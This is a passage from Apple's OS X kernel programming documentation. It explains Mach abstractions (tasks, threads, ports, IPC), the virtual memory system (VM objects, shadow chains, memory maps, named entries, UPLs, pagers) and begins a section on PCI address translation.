and extensible system than a monolithic kernel would allow, without the performance penalty of a pure microkernel. Thusin OS X, Mach is not primarily a communication hub between clients and servers. Instead, its value consists of its abstractions, its extensibility, and its flexibility. In particular, Mach provides ● object-based APIs with communication channels (for example, ports) as object references ● highly parallel execution, including preemptively scheduled threads and support for SMP ● a flexible scheduling framework, with support for real-time usage ● a complete set of IPC primitives, including messaging, RPC, synchronization, and notification ● support for large virtual addressspaces,shared memory regions, and memory objects backed by persistent store ● proven extensibility and portability, for example across instruction set architectures and in distributed environments ● security and resource management as a fundamental principle of design; all resources are virtualized Mach Kernel Abstractions Mach provides a small set of abstractions that have been designed to be both simple and powerful. These are the main kernel abstractions: ● Tasks. The units of resource ownership; each task consists of a virtual addressspace, a portright namespace, and one or more threads. (Similar to a process.) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 53 Mach Overview● Threads. The units of CPU execution within a task. ● Address space. In conjunction with memory managers, Mach implements the notion of a sparse virtual address space and shared memory. ● Memory objects. The internal units of memory management. Memory objectsinclude named entries and regions; they are representations of potentially persistent data that may be mapped into address spaces. ● Ports. Secure, simplex communication channels, accessible only via send and receive capabilities (known as port rights). ● IPC. Message queues, remote procedure calls, notifications, semaphores, and lock sets. ● Time. Clocks, timers, and waiting. At the trap level, the interface to most Mach abstractions consists of messages sent to and from kernel ports representing those objects. The trap-level interfaces (such as mach_msg_overwrite_trap) and message formats are themselves abstracted in normal usage by the Mach Interface Generator (MIG). MIG is used to compile procedural interfaces to the message-based APIs, based on descriptions of those APIs. Tasks and Threads OS X processes and POSIX threads (pthreads) are implemented on top of Mach tasks and threads, respectively. A thread is a point of control flow in a task. A task exists to provide resources for the threads it contains. This split is made to provide for parallelism and resource sharing. A thread ● is a point of control flow in a task. ● has access to all of the elements of the containing task. ● executes (potentially) in parallel with other threads, even threads within the same task. ● has minimal state information for low overhead. A task ● is a collection ofsystem resources. These resources, with the exception of the addressspace, are referenced by ports. These resources may be shared with other tasks if rights to the ports are so distributed. ● provides a large, potentially sparse address space, referenced by virtual address. Portions of this space may be shared through inheritance or external memory management. ● contains some number of threads. Mach Overview Tasks and Threads 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 54Note that a task has no life of its own—only threads execute instructions. When it is said that “task Y does X,” what is really meant is that “a thread contained within task Y does X.” A task is a fairly expensive entity. It exists to be a collection of resources. All of the threads in a task share everything. Two tasks share nothing without an explicit action (although the action is often simple) and some resources (such as port receive rights) cannot be shared between two tasks at all. A thread is a fairly lightweight entity. It is fairly cheap to create and has low overhead to operate. This is true because a thread has little state information (mostly its register state). Its owning task bears the burden of resource management. On a multiprocessor computer, it is possible for multiple threads in a task to execute in parallel. Even when parallelism is not the goal, multiple threads have an advantage in that each thread can use a synchronous programming style, instead of attempting asynchronous programming with a single thread attempting to provide multiple services. A thread is the basic computational entity. A thread belongs to one and only one task that defines its virtual address space. To affect the structure of the address space or to reference any resource other than the address space, the thread must execute a special trap instruction that causesthe kernel to perform operations on behalf of the thread or to send a message to some agent on behalf of the thread. In general, these traps manipulate resources associated with the task containing the thread. Requests can be made of the kernel to manipulate these entities: to create them, delete them, and affect their state. Mach provides a flexible framework for thread–scheduling policies. Early versions of OS X support both time-sharing and fixed-priority policies. A time-sharing thread’s priority is raised and lowered to balance its resource consumption against other time-sharing threads. Fixed-priority threads execute for a certain quantum of time, and then are put at the end of the queue of threads of equal priority. Setting a fixed priority thread’s quantum level to infinity allows the thread to run until it blocks, or until it is preempted by a thread of higher priority. High priority real-time threads are usually fixed priority. OS X also provides time constraint scheduling for real-time performance. This scheduling allows you to specify that your thread must get a certain time quantum within a certain period of time. Mach scheduling is described further in “Mach Scheduling and Thread Interfaces” (page 77). Ports, Port Rights, Port Sets, and Port Namespaces With the exception of the task’s virtual address space, all other Mach resources are accessed through a level of indirection known as a port. A port is an endpoint of a unidirectional communication channel between a client who requests a service and a server who providesthe service. If a reply isto be provided to such a service request, a second port must be used. This is comparable to a (unidirectional) pipe in UNIX parlance. Mach Overview Ports, Port Rights, Port Sets, and Port Namespaces 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 55In most cases, the resource that is accessed by the port (that is, named by it) is referred to as an object. Most objects named by a port have a single receiver and (potentially) multiple senders. That is, there is exactly one receive port, and at least one sending port, for a typical object such as a message queue. The service to be provided by an object is determined by the manager that receives the request sent to the object. It follows that the kernel is the receiver for ports associated with kernel-provided objects and that the receiver for ports associated with task-provided objects is the task providing those objects. For ports that name task-provided objects, it is possible to change the receiver of requests for that port to a different task, for example by passing the port to that task in a message. A single task may have multiple ports that refer to resources it supports. For that matter, any given entity can have multiple ports that represent it, each implying different sets of permissible operations. For example, many objects have a name port and a control port (sometimes called the privileged port). Access to the control port allows the object to be manipulated; access to the name port simply names the object so that you can obtain information about it or perform other non-privileged operations against it. Tasks have permissions to access ports in certain ways (send, receive, send-once); these are called port rights. A port can be accessed only via a right. Ports are often used to grant clients access to objects within Mach. Having the right to send to the object’sIPC port denotesthe right to manipulate the object in prescribed ways. As such, port right ownership is the fundamental security mechanism within Mach. Having a right to an object is to have a capability to access or manipulate that object. Port rights can be copied and moved between tasks via IPC. Doing so, in effect, passes capabilities to some object or server. One type of object referred to by a port is a port set. As the name suggests, a port set is a set of port rights that can be treated as a single unit when receiving a message or event from any of the members of the set. Port sets permit one thread to wait on a number of message and event sources, for example in work loops. Traditionally in Mach, the communication channel denoted by a port was always a queue of messages. However, OS X supports additional types of communication channels, and these new types of IPC object are also represented by ports and port rights. See the section “Interprocess Communication (IPC)” (page 58), for more details about messages and other IPC types. Ports and port rights do not have systemwide names that allow arbitrary ports or rights to be manipulated directly. Ports can be manipulated by a task only if the task has a port right in its port namespace. A port right is specified by a port name, an integer index into a 32-bit port namespace. Each task has associated with it a single port namespace. Tasks acquire port rights when another task explicitly insertsthem into its namespace, when they receive rights in messages, by creating objects that return a right to the object, and via Mach calls for certain special ports (mach_thread_self, mach_task_self, and mach_reply_port.) Mach Overview Ports, Port Rights, Port Sets, and Port Namespaces 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 56Memory Management As with most modern operating systems, Mach provides addressing to large, sparse, virtual address spaces. Runtime access is made via virtual addresses that may not correspond to locations in physical memory at the initial time of the attempted access. Mach is responsible for taking a requested virtual address and assigning it a corresponding location in physical memory. It does so through demand paging. A range of a virtual address space is populated with data when a memory object is mapped into that range. All data in an addressspace is ultimately provided through memory objects. Mach asksthe owner of a memory object (a pager) for the contents of a page when establishing it in physical memory and returns the possibly modified data to the pager before reclaiming the page. OS X includes two built-in pagers—the default pager and the vnode pager. The default pager handles nonpersistent memory, known as anonymous memory. Anonymous memory is zero-initialized, and it exists only during the life of a task. The vnode pager maps files into memory objects. Mach exports an interface to memory objects to allow their contents to be contributed by user-mode tasks. This interface is known as the External Memory Management Interface, or EMMI. The memory management subsystem exports virtual memory handles known as named entries or named memory entries. Like most kernel resources, these are denoted by ports. Having a named memory entry handle allows the owner to map the underlying virtual memory object or to pass the right to map the underlying object to others. Mapping a named entry in two different tasks results in a shared memory window between the two tasks, thus providing a flexible method for establishing shared memory. Beginning in OS X v10.1, the EMMI system was enhanced to support “portless” EMMI. In traditional EMMI, two Mach ports were created for each memory region, and likewise two ports for each cached vnode. Portless EMMI, in its initial implementation, replaces this with direct memory references (basically pointers). In a future release, ports will be used for communication with pagers outside the kernel, while using direct references for communication with pagers that reside in kernel space. The net result of these changes is that early versions of portless EMMI do not support pagers running outside of kernel space. This support is expected to be reinstated in a future release. Addressranges of virtual memory space may also be populated through direct allocation (using vm_allocate). The underlying virtual memory object is anonymous and backed by the default pager. Shared ranges of an address space may also be set up via inheritance. When new tasks are created, they are cloned from a parent. This cloning pertains to the underlying memory address space as well. Mapped portions of objects may be inherited as a copy, or asshared, or not at all, based on attributes associated with the mappings. Mach practices a form of delayed copy known as copy-on-write to optimize the performance of inherited copies on task creation. Mach Overview Memory Management 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 57Rather than directly copying the range, a copy-on-write optimization is accomplished by protected sharing. The two tasks share the memory to be copied, but with read-only access. When either task attempts to modify a portion of the range, that portion is copied at that time. Thislazy evaluation of memory copiesis an important optimization that permits simplifications in several areas, notably the messaging APIs. One other form of sharing is provided by Mach, through the export of named regions. A named region is a form of a named entry, but instead of being backed by a virtual memory object, it is backed by a virtual map fragment. This fragment may hold mappings to numerous virtual memory objects. It is mappable into other virtual maps, providing a way of inheriting not only a group of virtual memory objects but also their existing mapping relationships. This feature offers significant optimization in task setup, for example when sharing a complex region of the address space used for shared libraries. Interprocess Communication (IPC) Communication between tasksis an important element of the Mach philosophy. Mach supports a client/server system structure in which tasks(clients) accessservices by making requests of other tasks(servers) via messages sent over a communication channel. The endpoints of these communication channels in Mach are called ports, while port rights denote permission to use the channel. The forms of IPC provided by Mach include ● message queues ● semaphores ● notifications ● lock sets ● remote procedure calls (RPCs) The type of IPC object denoted by the port determines the operations permissible on that port, and how (and whether) data transfer occurs. Important: The IPC facilities in OS X are in a state of transition. In early versions of the system, not all of these IPC types may be implemented. There are two fundamentally different Mach APIs for raw manipulation of ports—the mach_ipc family and the mach_msg family. Within reason, both families may be used with any IPC object; however, the mach_ipc calls are preferred in new code. The mach_ipc calls maintain state information where appropriate in order to support the notion of a transaction. The mach_msg calls are supported for legacy code but deprecated; they are stateless. Mach Overview Interprocess Communication (IPC) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 58IPC Transactions and Event Dispatching When a thread calls mach_ipc_dispatch, it repeatedly processes events coming in on the registered port set. These events could be an argument block from an RPC object (as the results of a client’s call), a lock object being taken (as a result of some other thread’s releasing the lock), a notification or semaphore being posted, or a message coming in from a traditional message queue. These events are handled via callouts from mach_msg_dispatch. Some events imply a transaction during the lifetime of the callout. In the case of a lock, the state is the ownership of the lock. When the callout returns, the lock is released. In the case of remote procedure calls, the state is the client’s identity, the argument block, and the reply port. When the callout returns, the reply is sent. When the callout returns, the transaction (if any) is completed, and the thread waits for the next event. The mach_ipc_dispatch facility is intended to support work loops. Message Queues Originally, the sole style of interprocess communication in Mach was the message queue. Only one task can hold the receive right for a port denoting a message queue. This one task is allowed to receive (read) messages from the port queue. Multiple tasks can hold rights to the port that allow them to send (write) messages into the queue. A task communicates with another task by building a data structure that contains a set of data elements and then performing a message-send operation on a port for which it holds send rights. At some later time, the task with receive rights to that port will perform a message-receive operation. A message may consist of some or all of the following: ● pure data ● copies of memory ranges ● port rights ● kernel implicit attributes, such as the sender’s security token The message transfer is an asynchronous operation. The message is logically copied into the receiving task, possibly with copy-on-write optimizations. Multiple threads within the receiving task can be attempting to receive messages from a given port, but only one thread can receive any given message. Semaphores Semaphore IPC objects support wait, post, and post all operations. These are counting semaphores, in that posts are saved (counted) if there are no threads currently waiting in that semaphore’s wait queue. A post all operation wakes up all currently waiting threads. Mach Overview Interprocess Communication (IPC) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 59Notifications Like semaphores, notification objects also support post and wait operations, but with the addition of a state field. The state is a fixed-size, fixed-format field that is defined when the notification object is created. Each post updates the state field; there is a single state that is overwritten by each post. Locks A lock is an object that provides mutually exclusive access to a critical section. The primary interfaces to locks are transaction oriented (see “IPC Transactions and Event Dispatching” (page 59)). During the transaction, the thread holds the lock. When it returns from the transaction, the lock is released. Remote Procedure Call (RPC) Objects As the name implies, an RPC object is designed to facilitate and optimize remote procedure calls. The primary interfaces to RPC objects are transaction oriented (see “IPC Transactions and Event Dispatching” (page 59)) When an RPC object is created, a set of argument block formats is defined. When an RPC (a send on the object) is made by a client, it causes a message in one of the predefined formats to be created and queued on the object, then eventually passed to the server (the receiver). When the server returns from the transaction, the reply isreturned to the sender. Mach triesto optimize the transaction by executing the server using the client’s resources; this is called thread migration. Time Management The traditional abstraction of time in Mach is the clock, which provides a set of asynchronous alarm services based on mach_timespec_t. There are one or more clock objects, each defining a monotonically increasing time value expressed in nanoseconds. The real-time clock is built in, and is the most important, but there may be other clocksfor other notions of time in the system. Clockssupport operationsto get the current time,sleep for a given period, set an alarm (a notification that is sent at a given time), and so forth. The mach_timespec_t API is deprecated in OS X. The newer and preferred API is based on timer objects that in turn use AbsoluteTime as the basic data type. AbsoluteTime is a machine-dependent type, typically based on the platform-native time base. Routines are provided to convert AbsoluteTime values to and from other data types,such as nanoseconds. Timer objectssupport asynchronous, drift-free notification, cancellation, and premature alarms. They are more efficient and permit higher resolution than clocks. Mach Overview Time Management 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 60This chapter describes allocating memory and the low-level routinesfor modifying memory mapsin the kernel. It also describes a number of commonly used interfaces to the virtual memory system. It does not describe how to make changes in paging policy or add additional pagers. OS X does not support external pagers, although much of the functionality can be achieved in other ways, some of which are covered at a high level in this chapter. The implementation details of these interfaces are subject to change, however, and are thus left undocumented. With the exception of the section “Allocating Memory in the Kernel” (page 73), this chapter is of interest only if you are writing file systems or are modifying the virtual memory system itself. OS X VM Overview The VM system used in OS X is a descendent of Mach VM, which was created at Carnegie Mellon University in the 1980s. To a large extent, the fundamental design is the same, although some of the details are different, particularly when enhancing the VM system. It does, however, support the ability to request certain paging behavior through the use of universal page lists (UPLs). See “Universal Page Lists (UPLs)” (page 65) for more information. The design of Mach VM centers around the concept of physical memory being a cache for virtual memory. At its highest level, Mach VM consists of address spaces and ways to manipulate the contents of those address spaces from outside the space. These address spaces are sparse and have a notion of protections to limit what tasks can access their contents. At a lower level, the object level, virtual memory is seen as a collection of VM objects and memory objects, each with a particular owner and protections. These objects can be modified with object callsthat are available both to the task and (via the back end of the VM) to the pagers. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 61 Memory and Virtual MemoryNote: While memory objects and VM objects are closely related, the terms are not equivalent and should not be confused. .A VM object can be backed by one or more memory objects, which are, in turn, managed by a pager. A VM object may also be partially backed by other VM objects, as occurs in the case of shadow chains (described later in this section). The VM object is internal to the virtual memory system, and includes basic information about accessing the memory. The memory object, by contrast, is provided by the pager. The contents of the memory associated with that memory object can be retrieved from disk or some other backing store by exchanging messages with the memory object. Implicitly, each VM object is associated with a given pager through its memory object. VM objects are cached with system pages (RAM), which can be any power of two multiple of the hardware page size. In the OS X kernel,system pages are the same size as hardware pages. Each system page isrepresented in a given address space by a map entry. Each map entry has its own protection and inheritance. A given map entry can have an inheritance of shared, copy, or none. If a page is marked shared in a given map, child tasks share this page for reading and writing. If a page is marked copy, child tasks get a copy of this page (using copy-on-write). If a page is marked none, the child’s page is left unallocated. VM objects are managed by the machine-independent VM system, with the underlying virtual to physical mappings handled by the machine-dependent pmap system. The pmap system actually handles page tables, translation lookaside buffers, segments, and so on, depending on the design of the underlying hardware. When a VM object is duplicated (for example, the data pages from a process that has just called fork), a shadow object is created. A shadow object isinitially empty, and contains a reference to another object. When the contents of a page are modified, the page is copied from the parent object into the shadow object and then modified. When reading data from a page, if that page exists in the shadow object, the page listed in the shadow object is used. If the shadow object has no copy of that page, the original object is consulted. A series of shadow objects pointing to shadow objects or original objects is known as a shadow chain. Shadow chains can become arbitrarily long if an object is heavily reused in a copy-on-write fashion. However, since fork is frequently followed by exec, which replaces all of the material being shadowed, long chains are rare. Further, Mach automatically garbage collectsshadow objects, removing any intermediate shadow objects whose pages are no longer referenced by any (nondefunct) shadow object. It is even possible for the original object to be released if it no longer contains pages that are relevant to the chain. The VM calls available to an application include vm_map and vm_allocate, which can be used to map file data or anonymous memory into the address space. This is possible only because the address space is initially sparse. In general, an application can either map a file into its address space (through file mapping primitives, abstracted by BSD) or it can map an object (after being passed a handle to that object). In addition, a task can change the protections of the objects in its address space and can share those objects with other tasks. Memory and Virtual Memory OS X VM Overview 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 62In addition to the mapping and allocation aspects of virtual memory, the VM system contains a number of other subsystems. These include the back end (pagers) and the shared memory subsystem. There are also other subsystems closely tied to VM, including the VM shared memory server. These are described in “Other VM and VM-Related Subsystems” (page 68). Memory Maps Explained Each Mach task has its own memory map. In Mach, this memory map takes the form of an ordered doubly linked list. As described in “OS X VM Overview” (page 61), each of these objects contains a list of pages and shadow references to other objects. In general, you should never need to access a memory map directly unless you are modifying something deep within the VM system. The vm_map_entry structure contains task-specific information about an individual mapping along with a reference to the backing object. In essence, it is the glue between an VM object and a VM map. While the details of this data structure are beyond the scope of this document, a few fields are of particular importance. The field is_submap is a Boolean value that tells whether this map entry is a normal VM object or a submap. A submap is a collection of mappings that is part of a larger map. Submaps are often used to group mappings together for the purpose ofsharing them among multiple Mach tasks, but they may be used for many purposes. What makes a submap particularly powerful is that when several tasks have mapped a submap into their address space, they can see each other’s changes, not only to the contents of the objects in the map, but to the objects themselves. This means that as additional objects are added to or deleted from the submap, they appear in or disappear from the address spaces of all tasks that share that submap. The field behavior controls the paging reference behavior of a specified range in a given map. This value changes how pageins are clustered. Possible values are VM_BEHAVIOR_DEFAULT, VM_BEHAVIOR_RANDOM, VM_BEHAVIOR_SEQUENTIAL, and VM_BEHAVIOR_RSEQNTL, for default,random,sequential, orreverse-sequential pagein ordering. The protection and max_protection fields control the permissions on the object. The protection field indicates what rights the task currently has for the object, while the max_protection field contains the maximum access that the current task can obtain for the object. You might use the protection field when debugging shared memory. By setting the protection to be read-only, any inadvertent writes to the shared memory would cause an exception. However, when the task actually needsto write to thatshared region, it could increase its permissionsin the protection field to allow writes. Memory and Virtual Memory Memory Maps Explained 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 63It would be a security hole if a task could increase its own permissions on a memory object arbitrarily, however. In order to preserve a reasonable security model, the task that owns a memory object must be able to limit the rights granted to a subordinate task. For this reason, a task is not allowed to increase its protection beyond the permissions granted in max_protection. Possible valuesfor protection and max_protection are described in detail in xnu/osfmk/mach/vm_prot.h. Finally, the use_pmap field indicates whether a submap’s low-level mappings should be shared among all tasksinto which the submap is mapped. If the mappings are notshared, then the structure of the map isshared among all tasks, but the actual contents of the pages are not. For example,shared libraries are handled with two submaps. The read-only shared code section has use_pmap set to true. The read-write (nonshared) section has use_pmap set to false, forcing a clean copy of the library’s DATA segment to be mapped in from disk for each new task. Named Entries The OS X VM system provides an abstraction known as a named entry. A named entry is nothing more than a handle to a shared object or a submap. Shared memory support in OS X is achieved by sharing objects between the memory maps of various tasks. Shared memory objects must be created from existing VM objects by calling vm_allocate to allocate memory in your address space and then calling mach_make_memory_entry_64 to get a handle to the underlying VM object. The handle returned by mach_make_memory_entry_64 can be passed to vm_map to map that object into a given task’s address space. The handle can also be passed via IPC or other means to other tasks so that they can map it into their address spaces. This provides the ability to share objects with tasks that are not in your direct lineage, and also allows you to share additional memory with tasks in your direct lineage after those tasks are created. The other form of named entry, the submap, is used to group a set of mappings. The most common use of a submap is to share mappings among multiple Mach tasks. A submap can be created with vm_region_object_create. What makes a submap particularly powerful is that when several tasks have mapped a submap into their address space, they can see each other’s changes to both the data and the structure of the map. This means that one task can map or unmap a VM object in another task’s addressspace simply by mapping or unmapping that object in the submap. Memory and Virtual Memory Named Entries 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 64Universal Page Lists (UPLs) A universal page list, or UPL, is a data structure used when communicating with the virtual memory system. UPLs can be used to change the behavior of pages with respect to caching, permissions, mapping, and so on. UPLs can also be used to push data into and pull data from VM objects. The term is also often used to refer to the family of routines that operate on UPLs. The flags used when dealing with UPLs are described in osfmk/mach/memory_object_types.h. The life cycle of a UPL looks like this: 1. A UPL is created based on the contents of a VM object. This UPL includes information about the pages within that object. 2. That UPL is modified in some way. 3. The changes to the UPL are either committed (pushed back to the VM system) or aborted, with ubc_upl_commit or ubc_upl_abort, respectively. If you have a control handle for a given VM object (which generally means that you are inside a pager), you can use vm_object_upl_request to get a UPL for that object. Otherwise, you must use the vm_map_get_upl call. In either case, you are left with a handle to the UPL. When a pagein is requested, the pager receives a list of pages that are locked against the object, with certain pages set to not valid. The pager must either write data into those pages or must abort the transaction to prevent invalid data in the kernel. Similarly in pageout, the kernel must write the data to a backing store or abort the transaction to prevent data loss. The pager may also elect to bring additional pages into memory or throw additional pages out of memory at its discretion. Because pagers can be used both for virtual memory and for memory mapping of file data, when a pageout is requested, the data may need to be freed from memory, or it may be desirable to keep it there and simply flush the changes to disk. For this reason, the flag UPL_CLEAN_IN_PLACE exists to allow a page to be flushed to disk but not removed from memory. When a pager decides to page in or out additional pages, it must determine which pages to move. A pager can request all of the dirty pages by setting the RETURN_ONLY_DIRTY flag. It can also request all pages that are not in memory using the RETURN_ONLY_ABSENT flag. There is a slight problem, however. If a given page is marked as BUSY in the UPL, a request for information on that page would normally block. If the pager is doing prefetching or preflushing, this is not desirable, since it might be blocking on itself or on some other pager that is blocked waiting for the current transaction to complete. To avoid such deadlock, the UPL mechanism provides the UPL_NOBLOCK flag. This is frequently used in the anonymous pager for requesting free memory. Memory and Virtual Memory Universal Page Lists (UPLs) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 65The flag QUERY_OBJECT_TYPE can be used to determine if an object is physically contiguous and to get other properties of the underlying object. The flag UPL_PRECIOUS means that there should be only one copy of the data. This prevents having a copy both in memory and in the backing store. However, this breaks the adjacency of adjacent pages in the backing store, and is thus generally not used to avoid a performance hit. The flag SET_INTERNAL is used by the BSD subsystem to cause all information about a UPL to be contained in a single memory object so that it can be passed around more easily. It can only be used if your code is running in the kernel’s address space. Since this handle can be used for multiple small transactions (for example, when mapping a file into memory block-by-block), the UPL API includes functions for committing and aborting changes to only a portion of the UPL. These functions are upl_commit_range and upl_abort_range, respectively. To aid in the use of UPLsfor handling multi-part transactions, the upl_commit_range and upl_abort_range calls have a flag that causes the UPL to be freed when there are no unmodified pages in the UPL. If you use this flag, you must be very careful not to use the UPL after all ranges have been committed or aborted. Finally, the function vm_map_get_upl is frequently used in file systems. It gets the underlying VM object associated with a given range within an address space. Since this returns only the first object in that range, it is your responsibility to determine whether the entire range is covered by the resulting UPL and, if not, to make additional calls to get UPLs for other objects. Note that while the vm_map_get_upl call is against an address space range, most UPL calls are against a vm_object. Using Mach Memory Maps Warning: Thissection describesthe low-level API for dealing with Mach VM maps. These maps cannot be modified in this way from a kernel extension. These functions are not available for use in a KEXT. They are presented strictly for use within the VM system and other parts of Mach. If you are not doing in-kernel development, you should be using the methods described in the chapter “Boundary Crossings” (page 109). From the context of the kernel (not from a KEXT), there are two maps that you will probably need to deal with. The first is the kernel map. Since your code is executing in the kernel’s address space, no additional effort is needed to use memory referenced in the kernel map. However, you may need to add additional mappings into the kernel map and remove them when they are no longer needed. Memory and Virtual Memory Using Mach Memory Maps 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 66The second map of interest is the memory map for a given task. This is of most interest for code that accepts input from user programs, for example a sysctl or a Mach RPC handler. In nearly all cases, convenient wrappers provide the needed functionality, however. Most of these functions are based around the vm_offset_t type, which is a pointer-sized integer. In effect, you can think of them as pointers, with the caveat that they are not necessarily pointers to data in the kernel’s address space, depending on usage. The low-level VM map API includes the following functions: kern_return_t vm_map_copyin(vm_map_t src_map, vm_offset_t src_addr, vm_size_t len, boolean_t src_destroy, vm_map_copy_t *copy_result); kern_return_t vm_map_copyout(vm_map_t map, vm_offset_t *addr, /* Out */ register vm_map_copy_t copy); kern_return_t vm_map_copy_overwrite(vm_map_t dst_map, vm_offset_t dst_address,vm_map_copy_t copy, boolean_t interruptible, pmap_t pmap); void vm_map_copy_discard(vm_map_copy_t copy); void vm_map_wire(vm_map_t map, vm_offset_t start, vm_offset_t end, vm_prot_t access_type, boolean_t user_wire); void vm_map_unwire(vm_map_t map, vm_offset_t start, vm_offset_t end, boolean_t user_wire); The function vm_map_copyin copies data from an arbitrary (potentially non–kernel) memory map into a copy list and returns the copy list pointer in copy_result. If something goes wrong and you need to throw away this intermediate object, it should be freed with vm_map_copy_discard. In order to actually get the data from the copy list, you need to overwrite a memory object in the kernel’s address space with vm_map_copy_overwrite. This overwrites an object with the contents of a copy list. For most purposes, the value passed for interruptible should be FALSE, and pmap should be NULL. Memory and Virtual Memory Using Mach Memory Maps 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 67Copying data from the kernel to user space is exactly the same as copying data from user space, except that you pass kernel_map to vm_map_copyin and pass the user map to vm_map_copy_overwrite. In general, however, you should avoid doing this, since you could end up with a task’s memory being fragmented into lots of tiny objects, which is undesirable. Do not use vm_map_copyout when copying data into an existing user task’s address map. The function vm_map_copyout is used for filling an unused region in an address map. If the region is allocated, then vm_map_copyout does nothing. Because it requires knowledge of the current state of the map, it is primarily used when creating a new address map (for example, if you are manually creating a new process). For most purposes, you do not need to use vm_map_copyout. The functions vm_map_wire and vm_map_unwire can be used to wire and unwire portions of an address map. If you set the argument user_wire to TRUE, then the page can be unwired from user space. This should be set to FALSE if you are about to use the memory for I/O or for some other operation that cannot tolerate paging. In vm_map_wire, the argument access_type indicates the types of accesses that should not be allowed to generate a page fault. In general, however, you should be using vm_wire to wire memory. As mentioned earlier, this information is presented strictly for use in the heart of the kernel. You cannot use anything in this section from a kernel extension. Other VM and VM-Related Subsystems There are two additional VM subsystems: pagers and the working set detection subsystem. In addition, the VM shared memory server subsystem is closely tied to (but is not part of) the VM subsystem. This section describes these three VM and VM-related subsystems. Pagers OS X has three basic pagers: the vnode pager, the default pager (or anonymous pager), and the device pager. These are used by the VM system to actually get data into the VM objects that underlie named entries. Pagers are linked into the VM system through a combination of a subset of the old Mach pager interface and UPLs. The default pager is what most people think of when they think of a VM system. It is responsible for moving normal data into and out of the backing store. In addition, there is a facility known as the dynamic pager that sits on top of the default pager and handles the creation and deletion of backing store files. These pager files are filled with data in clusters (groups of pages). When the total fullness of the paging file pool reaches a high–water mark, the default pager asks the dynamic pager to allocate a new store file. When the pool drops below its low water mark, the VM system selects a pager file, moves its contents into other pager files, and deletes it from disk. Memory and Virtual Memory Other VM and VM-Related Subsystems 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 68The vnode pager has a 1:1 (onto) mapping between objects in VM space and open files (vnodes). It is used for memory mapped file I/O. The vnode pager is generally hidden behind calls to BSD file APIs. The device pager allows you to map non–general-purpose memory with the cache characteristics required for that memory (WIMG). Non–general–purpose memory includes physical addresses that are mapped onto hardware other than main memory—for example, PCI memory, frame buffer memory, and so on. The device pager is generally hidden behind calls to various I/O Kit functions. Working Set Detection Subsystem To improve performance, OS X has a subsystem known asthe working set detection subsystem. Thissubsystem is called on a VM fault; it keeps a profile of the fault behavior of each task from the time of its inception. In addition, just before a page request, the fault code asksthissubsystem which adjacent pagesshould be brought in, and then makes a single large request to the pager. Since files on disk tend to have fairly good locality, and since address space locality is largely preserved in the backing store, this provides a substantial performance boost. Also, since it is based upon the application’s previous behavior, it tends to pull in pages that would probably have otherwise been needed later. This occurs for all pagers. The working set code works well once it is established. However, without help, its performance would be the baseline performance until a profile for a given application has been developed. To overcome this, the first time that an application is launched in a given user context, the initial working set required to start the application is captured and stored in a file. From then on, when the application is started, that file is used to seed the working set. These working set files are established on a per-user basis. They are stored in /var/vm/app_profile and are only accessible by the super-user (and the kernel). VM Shared Memory Server Subsystem The VM shared memory server subsystem is a BSD service that is closely tied to VM, but is not part of VM. This server provides two submaps that are used for shared library support in OS X. Because shared libraries contain both read-only portions (text segment) and read-write portions (data segment), the two portions are treated separately to maximize efficiency. The read-only portions are completely shared between tasks, including the underlying pmap entries. The read-write portions share a common submap, but have different underlying data objects (achieved through copy-on-write). The three functions exported by the VM shared memory server subsystem should only be called by dyld. Do not use them in your programs. Memory and Virtual Memory Other VM and VM-Related Subsystems 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 69The function load_shared_file is used to load a new shared library into the system. Once such a file is loaded, other tasks can then depend on it, so a shared library cannot be unshared. However, a new set of shared regions can be created with new_system_shared_regions so that no new tasks will use old libraries. The function reset_shared_file can be used to reset any changes that your task may have made to its private copy of the data section for a file. Finally, the function new_system_shared_regions can be used to create a new set of shared regions for future tasks. New regions can be used when updating prebinding with new shared libraries to cause new tasks to see the latest libraries at their new locations in memory. (Users of old shared libraries will still work, but they will fall off the pre-bound path and will perform less efficiently.) It can also be used when dealing with private libraries that you want to share only with your task’s descendents. Address Spaces This section explains issues that some developers may see when using their drivers in Panther or later. These changes were necessitated by a combination of hardware and underlying OS changes; however, you may see problems resulting from the changes even on existing hardware. There are three basic areas of change in OS X v10.3. These are: ● IOMemoryDescriptor changes ● VM system (pmap) changes ● Kernel dependency changes These are described in detail in the sections that follow. Background Info on PCI Address Translation To allow existing device drivers to work with upcoming 64-bit system architectures, a number of changes were required. To explain these, a brief introduction to PCI bus bridges is needed. When a PCI device needs to perform a data transaction to or from main memory, the device driver calls a series of functions intended to prepare this memory for I/O. In an architecture where both the device drivers and the memory subsystem use 32-bit addressing, everything just works, so long as the memory doesn't get paged out during the I/O operation. As kernel memory is generally not pageable, the preparation islargely superfluous. On a system whose memory subsystem uses 64-bit addressing, however, this becomes a bit of a problem. Because the hardware devices on the PCI bus can only handle 32-bit addresses, the device can only “see” a 4 gigabyte aperture into the (potentially much larger) main memory at any given time. Memory and Virtual Memory Address Spaces 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 70There are two possible solutionsfor this problem. The easy (butslow)solution would be to use “bounce buffers”. In such a design, device drivers would copy data into memory specifically allocated within the bottom 4 gigs of memory. However, this incurs a performance penalty and also puts additional constraints on the lower 4 gigs of memory, causing numerous problems for the VM system. The other solution, the one chosen in Apple's 64-bit implementation, is to use address translation to “map” blocks of memory into the 32-bit address space of the PCI devices. While the PCI device can still only see a 4 gig aperture, that aperture can then be non-contiguous, and thus bounce buffers and other restrictions are unnecessary. This address translation is done using a part of the memory controller known as DART, which stands for Device Address Resolution Table. This introduces a number of potential 